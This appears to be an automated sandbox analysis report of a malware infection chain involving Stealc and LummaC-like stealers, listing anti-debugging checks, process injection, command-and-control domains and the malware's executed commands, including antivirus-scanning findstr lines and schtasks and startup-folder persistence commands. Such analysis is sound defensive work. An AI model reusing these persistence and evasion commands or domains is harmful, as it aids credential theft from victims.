Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3516110830.000000000174E000.00000004.00000020.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3482734739.000000000174B000.00000004.00000020.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3516424969.000000000174F000.00000004.00000020.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3280389269.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware?\|@`'
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: axplong.exe, 00000006.00000002.4838480992.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2096906788.000000000092F000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2121479799.0000000000BBF000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2126592998.0000000000BBF000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmp, 3288f0a855.exe, 00000028.00000000.3244460789.00000000007C8000.00000080.00000001.01000000.0000001E.sdmp, 3288f0a855.exe, 00000028.00000002.4383464411.00000000007C8000.00000040.00000001.01000000.0000001E.sdmp, 3288f0a855.exe, 00000028.00000003.3305788570.0000000004D92000.00000004.00000800.00020000.00000000.sdmp, YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000002.3618621418.000000000042C000.00000040.00000001.01000000.00000022.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 3288f0a855.exe, 00000028.00000003.3546434618.0000000005505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: JavUmar.exe, 0000001F.00000003.3603217662.0000000003BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-1

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-82189
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-82192
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-83368
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-82212
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-82032
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-82204
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_7-82233

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_052A0CBF Start: 052A0CF5 End: 052A0CF9

6_2_052A0CBF

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_052004B0 rdtsc

0_2_052004B0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_009E85B0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

6_2_009E85B0

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006AAD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_006AAD48

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006945C0 VirtualProtect ?,00000004,00000100,00000000

7_2_006945C0

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

7_2_006A9860

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A0645B mov eax, dword ptr fs:[00000030h]	6_2_00A0645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00A0A1C2 mov eax, dword ptr fs:[00000030h]	6_2_00A0A1C2
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006A9750 mov eax, dword ptr fs:[00000030h]	7_2_006A9750

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A7850 GetProcessHeap,HeapAlloc,GetUserNameA,

7_2_006A7850

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006AAD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_006AAD48
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006ACEEA SetUnhandledExceptionFilter,	7_2_006ACEEA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006AB33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_006AB33A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6C0FB66C
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6C0FB1F7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C2AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6C2AAC62

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 5004, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Memory written: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: offybirhtdi.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: activedomest.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: arenbootk.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: mediavelk.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: definitib.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: elaboretib.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: strikebripm.sbs
Source: new_v8.exe, 0000001E.00000002.3462581601.0000000000E56000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: ostracizez.sbs
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store
Source: 3288f0a855.exe, 00000028.00000003.3297788678.0000000004A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: opinieni.store
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: GOLD1234.exe, 00000029.00000002.3731666245.0000000000F41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seallysl.site
Source: RDX123456.exe, 0000002B.00000002.3396238839.0000000000746000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: computeryrati.site

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

7_2_006A9600

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 466000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46D000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11E7008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe "C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe "C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe "C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe"
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe "C:\Users\user\AppData\Local\Temp\10000061101\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3280 -ip 3280
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 260
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit

Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000000.2878274161.0000000000786000.00000002.00000001.01000000.0000000E.sdmp, Jurisdiction.pif, 00000015.00000003.2888924739.0000000003E52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000002.3619414835.0000000000481000.00000040.00000001.01000000.00000022.sdmp	Binary or memory string: nProgram Manager
Source: axplong.exe	Binary or memory string: {Program Manager
Source: file.exe, 00000000.00000002.2096906788.000000000092F000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2121479799.0000000000BBF000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2126592998.0000000000BBF000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: {Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_009ED312 cpuid

6_2_009ED312

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

7_2_006A7B90

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
